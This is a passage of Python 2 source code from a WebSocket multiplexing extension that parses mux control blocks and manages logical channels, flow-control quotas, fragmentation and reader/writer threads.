raise PhysicalConnectionError(
_DROP_CODE_ENCAPSULATED_FRAME_IS_TRUNCATED)
bits = ord(self._data[self._read_position])
self._read_position += 1
fin = (bits & 0x80) == 0x80
rsv1 = (bits & 0x40) == 0x40
rsv2 = (bits & 0x20) == 0x20
rsv3 = (bits & 0x10) == 0x10
opcode = bits & 0xf
payload = self.remaining_data()
# Consume rest of the message which is payload data of the original
# frame.
self._read_position = len(self._data)
return fin, rsv1, rsv2, rsv3, opcode, payload
def _read_number(self):
if self._read_position + 1 > len(self._data):
raise ValueError(
'Cannot read the first byte of number field')
number = ord(self._data[self._read_position])
if number & 0x80 == 0x80:
raise ValueError(
'The most significant bit of the first byte of number should '
'be unset')
self._read_position += 1
pos = self._read_position
if number == 127:
if pos + 8 > len(self._data):
raise ValueError('Invalid number field')
self._read_position += 8
number = struct.unpack('!Q', self._data[pos:pos+8])[0]
if number > 0x7FFFFFFFFFFFFFFF:
raise ValueError('Encoded number(%d) >= 2^63' % number)
if number <= 0xFFFF:
raise ValueError(
'%d should not be encoded by 9 bytes encoding' % number)
return number
if number == 126:
if pos + 2 > len(self._data):
raise ValueError('Invalid number field')
self._read_position += 2
number = struct.unpack('!H', self._data[pos:pos+2])[0]
if number <= 125:
raise ValueError(
'%d should not be encoded by 3 bytes encoding' % number)
return number
def _read_size_and_contents(self):
"""Reads data that consists of followings:
- the size of the contents encoded the same way as payload length
of the WebSocket Protocol with 1 bit padding at the head.
- the contents.
"""
try:
size = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
pos = self._read_position
if pos + size > len(self._data):
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Cannot read %d bytes data' % size)
self._read_position += size
return self._data[pos:pos+size]
def _read_add_channel_request(self, first_byte, control_block):
reserved = (first_byte >> 2) & 0x7
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
# Invalid encoding will be handled by MuxHandler.
encoding = first_byte & 0x3
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
control_block.encoding = encoding
encoded_handshake = self._read_size_and_contents()
control_block.encoded_handshake = encoded_handshake
return control_block
def _read_add_channel_response(self, first_byte, control_block):
reserved = (first_byte >> 2) & 0x3
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
control_block.accepted = (first_byte >> 4) & 1
control_block.encoding = first_byte & 0x3
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
control_block.encoded_handshake = self._read_size_and_contents()
return control_block
def _read_flow_control(self, first_byte, control_block):
reserved = first_byte & 0x1f
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
try:
control_block.channel_id = self.read_channel_id()
control_block.send_quota = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
return control_block
def _read_drop_channel(self, first_byte, control_block):
reserved = first_byte & 0x1f
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
reason = self._read_size_and_contents()
if len(reason) == 0:
control_block.drop_code = None
control_block.drop_message = ''
elif len(reason) >= 2:
control_block.drop_code = struct.unpack('!H', reason[:2])[0]
control_block.drop_message = reason[2:]
else:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Received DropChannel that conains only 1-byte reason')
return control_block
def _read_new_channel_slot(self, first_byte, control_block):
reserved = first_byte & 0x1e
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
control_block.fallback = first_byte & 1
try:
control_block.slots = self._read_number()
control_block.send_quota = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
return control_block
def read_control_blocks(self):
"""Reads control block(s).
Raises:
PhysicalConnectionError: when the payload contains invalid control
block(s).
StopIteration: when no control blocks left.
"""
while self._read_position < len(self._data):
first_byte = ord(self._data[self._read_position])
self._read_position += 1
opcode = (first_byte >> 5) & 0x7
control_block = _ControlBlock(opcode=opcode)
if opcode == _MUX_OPCODE_ADD_CHANNEL_REQUEST:
yield self._read_add_channel_request(first_byte, control_block)
elif opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
yield self._read_add_channel_response(
first_byte, control_block)
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
yield self._read_flow_control(first_byte, control_block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
yield self._read_drop_channel(first_byte, control_block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
yield self._read_new_channel_slot(first_byte, control_block)
else:
raise PhysicalConnectionError(
_DROP_CODE_UNKNOWN_MUX_OPCODE,
'Invalid opcode %d' % opcode)
assert self._read_position == len(self._data)
raise StopIteration
def remaining_data(self):
"""Returns remaining data."""
return self._data[self._read_position:]
class _LogicalRequest(object):
"""Mimics mod_python request."""
def __init__(self, channel_id, command, path, protocol, headers,
connection):
"""Constructs an instance.
Args:
channel_id: the channel id of the logical channel.
command: HTTP request command.
path: HTTP request path.
headers: HTTP headers.
connection: _LogicalConnection instance.
"""
self.channel_id = channel_id
self.method = command
self.uri = path
self.protocol = protocol
self.headers_in = headers
self.connection = connection
self.server_terminated = False
self.client_terminated = False
def is_https(self):
"""Mimics request.is_https(). Returns False because this method is
used only by old protocols (hixie and hybi00).
"""
return False
class _LogicalConnection(object):
"""Mimics mod_python mp_conn."""
# For details, see the comment of set_read_state().
STATE_ACTIVE = 1
STATE_GRACEFULLY_CLOSED = 2
STATE_TERMINATED = 3
def __init__(self, mux_handler, channel_id):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
channel_id: channel id of this connection.
"""
self._mux_handler = mux_handler
self._channel_id = channel_id
self._incoming_data = ''
# - Protects _waiting_write_completion
# - Signals the thread waiting for completion of write by mux handler
self._write_condition = threading.Condition()
self._waiting_write_completion = False
self._read_condition = threading.Condition()
self._read_state = self.STATE_ACTIVE
def get_local_addr(self):
"""Getter to mimic mp_conn.local_addr."""
return self._mux_handler.physical_connection.get_local_addr()
local_addr = property(get_local_addr)
def get_remote_addr(self):
"""Getter to mimic mp_conn.remote_addr."""
return self._mux_handler.physical_connection.get_remote_addr()
remote_addr = property(get_remote_addr)
def get_memorized_lines(self):
"""Gets memorized lines. Not supported."""
raise MuxUnexpectedException('_LogicalConnection does not support '
'get_memorized_lines')
def write(self, data):
"""Writes data. mux_handler sends data asynchronously. The caller will
be suspended until write done.
Args:
data: data to be written.
Raises:
MuxUnexpectedException: when called before finishing the previous
write.
"""
try:
self._write_condition.acquire()
if self._waiting_write_completion:
raise MuxUnexpectedException(
'Logical connection %d is already waiting the completion '
'of write' % self._channel_id)
self._waiting_write_completion = True
self._mux_handler.send_data(self._channel_id, data)
self._write_condition.wait()
# TODO(tyoshino): Raise an exception if woke up by on_writer_done.
finally:
self._write_condition.release()
def write_control_data(self, data):
"""Writes data via the control channel. Don't wait finishing write
because this method can be called by mux dispatcher.
Args:
data: data to be written.
"""
self._mux_handler.send_control_data(data)
def on_write_data_done(self):
"""Called when sending data is completed."""
try:
self._write_condition.acquire()
if not self._waiting_write_completion:
raise MuxUnexpectedException(
'Invalid call of on_write_data_done for logical '
'connection %d' % self._channel_id)
self._waiting_write_completion = False
self._write_condition.notify()
finally:
self._write_condition.release()
def on_writer_done(self):
"""Called by the mux handler when the writer thread has finished."""
try:
self._write_condition.acquire()
self._waiting_write_completion = False
self._write_condition.notify()
finally:
self._write_condition.release()
def append_frame_data(self, frame_data):
"""Appends incoming frame data. Called when mux_handler dispatches
frame data to the corresponding application.
Args:
frame_data: incoming frame data.
"""
self._read_condition.acquire()
self._incoming_data += frame_data
self._read_condition.notify()
self._read_condition.release()
def read(self, length):
"""Reads data. Blocks until enough data has arrived via physical
connection.
Args:
length: length of data to be read.
Raises:
LogicalConnectionClosedException: when closing handshake for this
logical channel has been received.
ConnectionTerminatedException: when the physical connection has
closed, or an error is caused on the reader thread.
"""
self._read_condition.acquire()
while (self._read_state == self.STATE_ACTIVE and
len(self._incoming_data) < length):
self._read_condition.wait()
try:
if self._read_state == self.STATE_GRACEFULLY_CLOSED:
raise LogicalConnectionClosedException(
'Logical channel %d has closed.' % self._channel_id)
elif self._read_state == self.STATE_TERMINATED:
raise ConnectionTerminatedException(
'Receiving %d byte failed. Logical channel (%d) closed' %
(length, self._channel_id))
value = self._incoming_data[:length]
self._incoming_data = self._incoming_data[length:]
finally:
self._read_condition.release()
return value
def set_read_state(self, new_state):
"""Sets the state of this connection. Called when an event for this
connection has occurred.
Args:
new_state: state to be set. new_state must be one of followings:
- STATE_GRACEFULLY_CLOSED: when closing handshake for this
connection has been received.
- STATE_TERMINATED: when the physical connection has closed or
DropChannel of this connection has received.
"""
self._read_condition.acquire()
self._read_state = new_state
self._read_condition.notify()
self._read_condition.release()
class _InnerMessage(object):
"""Holds the result of _InnerMessageBuilder.build().
"""
def __init__(self, opcode, payload):
self.opcode = opcode
self.payload = payload
class _InnerMessageBuilder(object):
"""A class that holds the context of inner message fragmentation and
builds a message from fragmented inner frame(s).
"""
def __init__(self):
self._control_opcode = None
self._pending_control_fragments = []
self._message_opcode = None
self._pending_message_fragments = []
self._frame_handler = self._handle_first
def _handle_first(self, frame):
if frame.opcode == common.OPCODE_CONTINUATION:
raise InvalidFrameException('Sending invalid continuation opcode')
if common.is_control_opcode(frame.opcode):
return self._process_first_fragmented_control(frame)
else:
return self._process_first_fragmented_message(frame)
def _process_first_fragmented_control(self, frame):
self._control_opcode = frame.opcode
self._pending_control_fragments.append(frame.payload)
if not frame.fin:
self._frame_handler = self._handle_fragmented_control
return None
return self._reassemble_fragmented_control()
def _process_first_fragmented_message(self, frame):
self._message_opcode = frame.opcode
self._pending_message_fragments.append(frame.payload)
if not frame.fin:
self._frame_handler = self._handle_fragmented_message
return None
return self._reassemble_fragmented_message()
def _handle_fragmented_control(self, frame):
if frame.opcode != common.OPCODE_CONTINUATION:
raise InvalidFrameException(
'Sending invalid opcode %d while sending fragmented control '
'message' % frame.opcode)
self._pending_control_fragments.append(frame.payload)
if not frame.fin:
return None
return self._reassemble_fragmented_control()
def _reassemble_fragmented_control(self):
opcode = self._control_opcode
payload = ''.join(self._pending_control_fragments)
self._control_opcode = None
self._pending_control_fragments = []
if self._message_opcode is not None:
self._frame_handler = self._handle_fragmented_message
else:
self._frame_handler = self._handle_first
return _InnerMessage(opcode, payload)
def _handle_fragmented_message(self, frame):
# Sender can interleave a control message while sending fragmented
# messages.
if common.is_control_opcode(frame.opcode):
if self._control_opcode is not None:
raise MuxUnexpectedException(
'Should not reach here(Bug in builder)')
return self._process_first_fragmented_control(frame)
if frame.opcode != common.OPCODE_CONTINUATION:
raise InvalidFrameException(
'Sending invalid opcode %d while sending fragmented message' %
frame.opcode)
self._pending_message_fragments.append(frame.payload)
if not frame.fin:
return None
return self._reassemble_fragmented_message()
def _reassemble_fragmented_message(self):
opcode = self._message_opcode
payload = ''.join(self._pending_message_fragments)
self._message_opcode = None
self._pending_message_fragments = []
self._frame_handler = self._handle_first
return _InnerMessage(opcode, payload)
def build(self, frame):
"""Build an inner message. Returns an _InnerMessage instance when
the given frame is the last fragmented frame. Returns None otherwise.
Args:
frame: an inner frame.
Raises:
InvalidFrameException: when received invalid opcode. (e.g.
receiving non continuation data opcode but the fin flag of
the previous inner frame was not set.)
"""
return self._frame_handler(frame)
class _LogicalStream(Stream):
"""Mimics the Stream class. This class interprets multiplexed WebSocket
frames.
"""
def __init__(self, request, stream_options, send_quota, receive_quota):
"""Constructs an instance.
Args:
request: _LogicalRequest instance.
stream_options: StreamOptions instance.
send_quota: Initial send quota.
receive_quota: Initial receive quota.
"""
# Physical stream is responsible for masking.
stream_options.unmask_receive = False
Stream.__init__(self, request, stream_options)
self._send_closed = False
self._send_quota = send_quota
# - Protects _send_closed and _send_quota
# - Signals the thread waiting for send quota replenished
self._send_condition = threading.Condition()
# The opcode of the first frame in messages.
self._message_opcode = common.OPCODE_TEXT
# True when the last message was fragmented.
self._last_message_was_fragmented = False
self._receive_quota = receive_quota
self._write_inner_frame_semaphore = threading.Semaphore()
self._inner_message_builder = _InnerMessageBuilder()
def _create_inner_frame(self, opcode, payload, end=True):
frame = Frame(fin=end, opcode=opcode, payload=payload)
for frame_filter in self._options.outgoing_frame_filters:
frame_filter.filter(frame)
if len(payload) != len(frame.payload):
raise MuxUnexpectedException(
'Mux extension must not be used after extensions which change '
' frame boundary')
first_byte = ((frame.fin << 7) | (frame.rsv1 << 6) |
(frame.rsv2 << 5) | (frame.rsv3 << 4) | frame.opcode)
return chr(first_byte) + frame.payload
def _write_inner_frame(self, opcode, payload, end=True):
payload_length = len(payload)
write_position = 0
try:
# An inner frame will be fragmented if there is no enough send
# quota. This semaphore ensures that fragmented inner frames are
# sent in order on the logical channel.
# Note that frames that come from other logical channels or
# multiplexing control blocks can be inserted between fragmented
# inner frames on the physical channel.
self._write_inner_frame_semaphore.acquire()
# Consume an octet quota when this is the first fragmented frame.
if opcode != common.OPCODE_CONTINUATION:
try:
self._send_condition.acquire()
while (not self._send_closed) and self._send_quota == 0:
self._send_condition.wait()
if self._send_closed:
raise BadOperationException(
'Logical connection %d is closed' %
self._request.channel_id)
self._send_quota -= 1
finally:
self._send_condition.release()
while write_position < payload_length:
try:
self._send_condition.acquire()
while (not self._send_closed) and self._send_quota == 0:
self._logger.debug(
'No quota. Waiting FlowControl message for %d.' %
self._request.channel_id)
self._send_condition.wait()
if self._send_closed:
raise BadOperationException(
'Logical connection %d is closed' %
self.request._channel_id)
remaining = payload_length - write_position
write_length = min(self._send_quota, remaining)
inner_frame_end = (
end and
(write_position + write_length == payload_length))
inner_frame = self._create_inner_frame(
opcode,
payload[write_position:write_position+write_length],
inner_frame_end)
self._send_quota -= write_length
self._logger.debug('Consumed quota=%d, remaining=%d' %
(write_length, self._send_quota))
finally:
self._send_condition.release()
# Writing data will block the worker so we need to release
# _send_condition before writing.
self._logger.debug('Sending inner frame: %r' % inner_frame)
self._request.connection.write(inner_frame)
write_position += write_length
opcode = common.OPCODE_CONTINUATION
except ValueError, e:
raise BadOperationException(e)
finally:
self._write_inner_frame_semaphore.release()
def replenish_send_quota(self, send_quota):
"""Replenish send quota."""
try:
self._send_condition.acquire()
if self._send_quota + send_quota > 0x7FFFFFFFFFFFFFFF:
self._send_quota = 0
raise LogicalChannelError(
self._request.channel_id, _DROP_CODE_SEND_QUOTA_OVERFLOW)
self._send_quota += send_quota
self._logger.debug('Replenished send quota for channel id %d: %d' %
(self._request.channel_id, self._send_quota))
finally:
self._send_condition.notify()
self._send_condition.release()
def consume_receive_quota(self, amount):
"""Consumes receive quota. Returns False on failure."""
if self._receive_quota < amount:
self._logger.debug('Violate quota on channel id %d: %d < %d' %
(self._request.channel_id,
self._receive_quota, amount))
return False
self._receive_quota -= amount
return True
def send_message(self, message, end=True, binary=False):
"""Override Stream.send_message."""
if self._request.server_terminated:
raise BadOperationException(
'Requested send_message after sending out a closing handshake')
if binary and isinstance(message, unicode):
raise BadOperationException(
'Message for binary frame must be instance of str')
if binary:
opcode = common.OPCODE_BINARY
else:
opcode = common.OPCODE_TEXT
message = message.encode('utf-8')
for message_filter in self._options.outgoing_message_filters:
message = message_filter.filter(message, end, binary)
if self._last_message_was_fragmented:
if opcode != self._message_opcode:
raise BadOperationException('Message types are different in '
'frames for the same message')
opcode = common.OPCODE_CONTINUATION
else:
self._message_opcode = opcode
self._write_inner_frame(opcode, message, end)
self._last_message_was_fragmented = not end
def _receive_frame(self):
"""Overrides Stream._receive_frame.
In addition to call Stream._receive_frame, this method adds the amount
of payload to receiving quota and sends FlowControl to the client.
We need to do it here because Stream.receive_message() handles
control frames internally.
"""
opcode, payload, fin, rsv1, rsv2, rsv3 = Stream._receive_frame(self)
amount = len(payload)
# Replenish extra one octet when receiving the first fragmented frame.
if opcode != common.OPCODE_CONTINUATION:
amount += 1
self._receive_quota += amount
frame_data = _create_flow_control(self._request.channel_id,
amount)
self._logger.debug('Sending flow control for %d, replenished=%d' %
(self._request.channel_id, amount))
self._request.connection.write_control_data(frame_data)
return opcode, payload, fin, rsv1, rsv2, rsv3
def _get_message_from_frame(self, frame):
"""Overrides Stream._get_message_from_frame.
"""
try:
inner_message = self._inner_message_builder.build(frame)
except InvalidFrameException:
raise LogicalChannelError(
self._request.channel_id, _DROP_CODE_BAD_FRAGMENTATION)
if inner_message is None:
return None
self._original_opcode = inner_message.opcode
return inner_message.payload
def receive_message(self):
"""Overrides Stream.receive_message."""
# Just call Stream.receive_message(), but catch
# LogicalConnectionClosedException, which is raised when the logical
# connection has closed gracefully.
try:
return Stream.receive_message(self)
except LogicalConnectionClosedException, e:
self._logger.debug('%s', e)
return None
def _send_closing_handshake(self, code, reason):
"""Overrides Stream._send_closing_handshake."""
body = create_closing_handshake_body(code, reason)
self._logger.debug('Sending closing handshake for %d: (%r, %r)' %
(self._request.channel_id, code, reason))
self._write_inner_frame(common.OPCODE_CLOSE, body, end=True)
self._request.server_terminated = True
def send_ping(self, body=''):
"""Overrides Stream.send_ping"""
self._logger.debug('Sending ping on logical channel %d: %r' %
(self._request.channel_id, body))
self._write_inner_frame(common.OPCODE_PING, body, end=True)
self._ping_queue.append(body)
def _send_pong(self, body):
"""Overrides Stream._send_pong"""
self._logger.debug('Sending pong on logical channel %d: %r' %
(self._request.channel_id, body))
self._write_inner_frame(common.OPCODE_PONG, body, end=True)
def close_connection(self, code=common.STATUS_NORMAL_CLOSURE, reason=''):
"""Overrides Stream.close_connection."""
# TODO(bashi): Implement
self._logger.debug('Closing logical connection %d' %
self._request.channel_id)
self._request.server_terminated = True
def stop_sending(self):
"""Stops accepting new send operation (_write_inner_frame)."""
self._send_condition.acquire()
self._send_closed = True
self._send_condition.notify()
self._send_condition.release()
class _OutgoingData(object):
"""A structure that holds data to be sent via physical connection and
origin of the data.
"""
def __init__(self, channel_id, data):
self.channel_id = channel_id
self.data = data
class _PhysicalConnectionWriter(threading.Thread):
"""A thread that is responsible for writing data to physical connection.
TODO(bashi): Make sure there is no thread-safety problem when the reader
thread reads data from the same socket at a time.
"""
def __init__(self, mux_handler):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self.setDaemon(True)
# When set, make this thread stop accepting new data, flush pending
# data and exit.
self._stop_requested = False
# The close code of the physical connection.
self._close_code = common.STATUS_NORMAL_CLOSURE
# Deque for passing write data. It's protected by _deque_condition
# until _stop_requested is set.
self._deque = collections.deque()
# - Protects _deque, _stop_requested and _close_code
# - Signals threads waiting for them to be available
self._deque_condition = threading.Condition()
def put_outgoing_data(self, data):
"""Puts outgoing data.
Args:
data: _OutgoingData instance.
Raises:
BadOperationException: when the thread has been requested to
terminate.
"""
try:
self._deque_condition.acquire()
if self._stop_requested:
raise BadOperationException('Cannot write data anymore')
self._deque.append(data)
self._deque_condition.notify()
finally:
self._deque_condition.release()
def _write_data(self, outgoing_data):
message = (_encode_channel_id(outgoing_data.channel_id) +
outgoing_data.data)
try:
self._mux_handler.physical_stream.send_message(
message=message, end=True, binary=True)
except Exception, e:
util.prepend_message_to_exception(
'Failed to send message to %r: ' %
(self._mux_handler.physical_connection.remote_addr,), e)
raise
# TODO(bashi): It would be better to block the thread that sends
# control data as well.
if outgoing_data.channel_id != _CONTROL_CHANNEL_ID:
self._mux_handler.notify_write_data_done(outgoing_data.channel_id)
def run(self):
try:
self._deque_condition.acquire()
while not self._stop_requested:
if len(self._deque) == 0:
self._deque_condition.wait()
continue
outgoing_data = self._deque.popleft()
self._deque_condition.release()
self._write_data(outgoing_data)
self._deque_condition.acquire()
# Flush deque.
#
# At this point, self._deque_condition is always acquired.
try:
while len(self._deque) > 0:
outgoing_data = self._deque.popleft()
self._write_data(outgoing_data)
finally:
self._deque_condition.release()
# Close physical connection.
try:
# Don't wait the response here. The response will be read
# by the reader thread.
self._mux_handler.physical_stream.close_connection(
self._close_code, wait_response=False)
except Exception, e:
util.prepend_message_to_exception(
'Failed to close the physical connection: %r' % e)
raise
finally:
self._mux_handler.notify_writer_done()
def stop(self, close_code=common.STATUS_NORMAL_CLOSURE):
"""Stops the writer thread."""
self._deque_condition.acquire()
self._stop_requested = True
self._close_code = close_code
self._deque_condition.notify()
self._deque_condition.release()
class _PhysicalConnectionReader(threading.Thread):
"""A thread that is responsible for reading data from physical connection.
"""
def __init__(self, mux_handler):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self.setDaemon(True)
def run(self):
while True:
try:
physical_stream = self._mux_handler.physical_stream
message = physical_stream.receive_message()
if message is None:
break
# Below happens only when a data message is received.
opcode = physical_stream.get_last_received_opcode()
if opcode != common.OPCODE_BINARY:
self._mux_handler.fail_physical_connection(
_DROP_CODE_INVALID_ENCAPSULATING_MESSAGE,
'Received a text message on physical connection')
break
except ConnectionTerminatedException, e:
self._logger.debug('%s', e)
break
try:
self._mux_handler.dispatch_message(message)
except PhysicalConnectionError, e:
self._mux_handler.fail_physical_connection(
e.drop_code, e.message)
break
except LogicalChannelError, e:
self._mux_handler.fail_logical_channel(
e.channel_id, e.drop_code, e.message)
except Exception, e:
self._logger.debug(traceback.format_exc())
break
self._mux_handler.notify_reader_done()
class _Worker(threading.Thread):
"""A thread that is responsible for running the corresponding application
handler.
"""
def __init__(self, mux_handler, request):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
request: _LogicalRequest instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self._request = request
self.setDaemon(True)
def run(self):
self._logger.debug('Logical channel worker started. (id=%d)' %
self._request.channel_id)
try:
# Non-critical exceptions will be handled by dispatcher.
self._mux_handler.dispatcher.transfer_data(self._request)
except LogicalChannelError, e:
self._mux_handler.fail_logical_channel(
e.channel_id, e.drop_code, e.message)
finally:
self._mux_handler.notify_worker_done(self._request.channel_id)
class _MuxHandshaker(hybi.Handshaker):
"""Opening handshake processor for multiplexing."""
_DUMMY_WEBSOCKET_KEY = 'dGhlIHNhbXBsZSBub25jZQ=='
def __init__(self, request, dispatcher, send_quota, receive_quota):
"""Constructs an instance.
Args:
request: _LogicalRequest instance.
dispatcher: Dispatcher instance (dispatch.Dispatcher).
send_quota: Initial send quota.
receive_quota: Initial receive quota.
"""
hybi.Handshaker.__init__(self, request, dispatcher)
self._send_quota = send_quota
self._receive_quota = receive_quota
# Append headers which should not be included in handshake field of
# AddChannelRequest.
# TODO(bashi): Make sure whether we should raise exception when
# these headers are included already.
request.headers_in[common.UPGRADE_HEADER] = (
common.WEBSOCKET_UPGRADE_TYPE)
request.headers_in[common.SEC_WEBSOCKET_VERSION_HEADER] = (
str(common.VERSION_HYBI_LATEST))
request.headers_in[common.SEC_WEBSOCKET_KEY_HEADER] = (
self._DUMMY_WEBSOCKET_KEY)
def _create_stream(self, stream_options):
"""Override hybi.Handshaker._create_stream."""
self._logger.debug('Creating logical stream for %d' %
self._request.channel_id)
return _LogicalStream(
self._request, stream_options, self._send_quota,
self._receive_quota)
def _create_handshake_response(self, accept):
"""Override hybi._create_handshake_response."""
response = []
response.append('HTTP/1.1 101 Switching Protocols\r\n')
# Upgrade and Sec-WebSocket-Accept should be excluded.
response.append('%s: %s\r\n' % (
common.CONNECTION_HEADER, common.UPGRADE_CONNECTION_TYPE))
if self._request.ws_protocol is not None:
response.append('%s: %s\r\n' % (
common.SEC_WEBSOCKET_PROTOCOL_HEADER,
self._request.ws_protocol))
if (self._request.ws_extensions is not None and
len(self._request.ws_extensions) != 0):
response.append('%s: %s\r\n' % (
common.SEC_WEBSOCKET_EXTENSIONS_HEADER,
common.format_extensions(self._request.ws_extensions)))
response.append('\r\n')
return ''.join(response)
def _send_handshake(self, accept):
"""Override hybi.Handshaker._send_handshake."""
# Don't send handshake response for the default channel
if self._request.channel_id == _DEFAULT_CHANNEL_ID:
return
handshake_response = self._create_handshake_response(accept)
frame_data = _create_add_channel_response(
self._request.channel_id,
handshake_response)
self._logger.debug('Sending handshake response for %d: %r' %
(self._request.channel_id, frame_data))
self._request.connection.write_control_data(frame_data)
class _LogicalChannelData(object):
"""A structure that holds information about logical channel.
"""
def __init__(self, request, worker):
self.request = request
self.worker = worker
self.drop_code = _DROP_CODE_NORMAL_CLOSURE
self.drop_message = ''
class _HandshakeDeltaBase(object):
"""A class that holds information for delta-encoded handshake."""
def __init__(self, headers):
self._headers = headers
def create_headers(self, delta=None):
"""Creates request headers for an AddChannelRequest that has
delta-encoded handshake.
Args:
delta: headers should be overridden.
"""
headers = copy.copy(self._headers)
if delta:
for key, value in delta.items():
# The spec requires that a header with an empty value is
# removed from the delta base.
if len(value) == 0 and headers.has_key(key):
del headers[key]
else:
headers[key] = value
return headers
class _MuxHandler(object):
"""Multiplexing handler. When a handler starts, it launches three
threads; the reader thread, the writer thread, and a worker thread.
The reader thread reads data from the physical stream, i.e., the
ws_stream object of the underlying websocket connection. The reader
thread interprets multiplexed frames and dispatches them to logical
channels. Methods of this class are mostly called by the reader thread.
The writer thread sends multiplexed frames which are created by
logical channels via the physical connection.
The worker thread launched at the starting point handles the
"Implicitly Opened Connection". If multiplexing handler receives
an AddChannelRequest and accepts it, the handler will launch a new worker
thread and dispatch the request to it.
"""
def __init__(self, request, dispatcher):
"""Constructs an instance.
Args:
request: mod_python request of the physical connection.
dispatcher: Dispatcher instance (dispatch.Dispatcher).
"""
self.original_request = request
self.dispatcher = dispatcher
self.physical_connection = request.connection
self.physical_stream = request.ws_stream
self._logger = util.get_class_logger(self)
self._logical_channels = {}
self._logical_channels_condition = threading.Condition()
# Holds client's initial quota
self._channel_slots = collections.deque()
self._handshake_base = None
self._worker_done_notify_received = False
self._reader = None
self._writer = None
def start(self):
"""Starts the handler.
Raises:
MuxUnexpectedException: when the handler already started, or when
opening handshake of the default channel fails.
"""
if self._reader or self._writer:
raise MuxUnexpectedException('MuxHandler already started')
self._reader = _PhysicalConnectionReader(self)
self._writer = _PhysicalConnectionWriter(self)
self._reader.start()
self._writer.start()
# Create "Implicitly Opened Connection".
logical_connection = _LogicalConnection(self, _DEFAULT_CHANNEL_ID)
headers = copy.copy(self.original_request.headers_in)
# Add extensions for logical channel.
headers[common.SEC_WEBSOCKET_EXTENSIONS_HEADER] = (
common.format_extensions(
self.original_request.mux_processor.extensions()))
self._handshake_base = _HandshakeDeltaBase(headers)
logical_request = _LogicalRequest(
_DEFAULT_CHANNEL_ID,
self.original_request.method,
self.original_request.uri,
self.original_request.protocol,
self._handshake_base.create_headers(),
logical_connection)
# Client's send quota for the implicitly opened connection is zero,
# but we will send FlowControl later so set the initial quota to
# _INITIAL_QUOTA_FOR_CLIENT.
self._channel_slots.append(_INITIAL_QUOTA_FOR_CLIENT)
send_quota = self.original_request.mux_processor.quota()
if not self._do_handshake_for_logical_request(
logical_request, send_quota=send_quota):
raise MuxUnexpectedException(
'Failed handshake on the default channel id')
self._add_logical_channel(logical_request)
# Send FlowControl for the implicitly opened connection.
frame_data = _create_flow_control(_DEFAULT_CHANNEL_ID,
_INITIAL_QUOTA_FOR_CLIENT)
logical_request.connection.write_control_data(frame_data)
def add_channel_slots(self, slots, send_quota):
"""Adds channel slots.
Args:
slots: number of slots to be added.
send_quota: initial send quota for slots.
"""
self._channel_slots.extend([send_quota] * slots)
# Send NewChannelSlot to client.
frame_data = _create_new_channel_slot(slots, send_quota)
self.send_control_data(frame_data)
def wait_until_done(self, timeout=None):
"""Waits until all workers are done. Returns False when timeout has
occurred. Returns True on success.
Args:
timeout: timeout in sec.
"""
self._logical_channels_condition.acquire()
try:
while len(self._logical_channels) > 0:
self._logger.debug('Waiting workers(%d)...' %
len(self._logical_channels))
self._worker_done_notify_received = False
self._logical_channels_condition.wait(timeout)
if not self._worker_done_notify_received:
self._logger.debug('Waiting worker(s) timed out')
return False
finally:
self._logical_channels_condition.release()
# Flush pending outgoing data
self._writer.stop()
self._writer.join()
return True
def notify_write_data_done(self, channel_id):
"""Called by the writer thread when a write operation has done.
Args:
channel_id: objective channel id.
"""
try:
self._logical_channels_condition.acquire()
if channel_id in self._logical_channels:
channel_data = self._logical_channels[channel_id]
channel_data.request.connection.on_write_data_done()
else:
self._logger.debug('Seems that logical channel for %d has gone'
% channel_id)
finally:
self._logical_channels_condition.release()
def send_control_data(self, data):
"""Sends data via the control channel.
Args:
data: data to be sent.
"""
self._writer.put_outgoing_data(_OutgoingData(
channel_id=_CONTROL_CHANNEL_ID, data=data))
def send_data(self, channel_id, data):
"""Sends data via given logical channel. This method is called by
worker threads.
Args:
channel_id: objective channel id.
data: data to be sent.
"""
self._writer.put_outgoing_data(_OutgoingData(
channel_id=channel_id, data=data))
def _send_drop_channel(self, channel_id, code=None, message=''):
frame_data = _create_drop_channel(channel_id, code, message)
self._logger.debug(
'Sending drop channel for channel id %d' % channel_id)
self.send_control_data(frame_data)
